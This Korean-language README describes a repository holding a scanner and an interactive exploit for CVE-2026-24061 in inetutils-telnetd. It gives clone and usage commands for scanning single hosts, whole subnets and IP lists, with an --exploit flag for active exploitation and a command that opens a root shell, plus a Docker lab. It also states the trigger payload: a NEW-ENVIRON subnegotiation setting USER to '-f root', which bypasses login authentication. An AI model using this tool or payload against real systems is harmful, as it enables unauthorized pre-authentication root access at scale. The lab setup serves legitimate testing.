
CVE-2026-24061(inetutils-telnetd)용 스캐너 및 대화형 익스플로잇으로, 조작된 NEW-ENVIRON 협상을 통해 인증 전 루트 액세스를 가능하게 합니다. 멀티스레드 스캐닝과 Docker 랩을 포함합니다.
👨💻 작성자: Furkan KAYAPINAR (@FurkanKAYAPINAR)
이 저장소에는 CVE-2026-24061에 대한 취약점 스캐너와 대화형 익스플로잇이 포함되어 있습니다. 이 취약점은 inetutils-telnetd(및 잠재적으로 다른 Telnet 구현체)가 NEW-ENVIRON Telnet 옵션을 부적절하게 처리하여 -f root 페이로드를 사용한 원격 사전 인증 접근을 허용하는 문제에 영향을 미칩니다.
--exploit 플래그가 포함되어 있습니다.inetutils-telnetd를 실행하는 Docker 기반 Ubuntu 환경입니다.Python 3.x가 설치되어 있는지 확인하세요.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## 사용법
NEW-ENVIRON 취약점에 대한 대상 스캔.
# 단일 대상 스캔
python3 scanner.py -t 192.168.1.100 -p 1903
# 서브넷 스캔
python3 scanner.py -s 192.168.1.0/24 -p 1903
# IP 목록 스캔 및 활성 익스플로잇 시도 (RCE 확인)
python3 scanner.py -l ips.txt -p 1903 --exploit
대화형 루트 셸 접근 권한 획득.
python3 exploit.py -t 127.0.0.1 -p 1903
테스트를 위한 로컬 취약 환경 배포:
cd lab
docker-compose up -d --build
이 취약점은 Telnet 협상 단계에서 트리거됩니다. 서버의 DO NEW-ENVIRON 요청에 특수하게 제작된 IS VAR "USER" VALUE "-f root" 하위 협상 패킷으로 응답하면, 서버 측 telnetd 프로세스가 login 프로세스에 -f root 플래그를 전달하도록 속아 인증을 우회합니다.
[!WARNING]
이 도구는 교육 및 공인된 보안 테스트 목적으로만 사용해야 합니다. 컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다.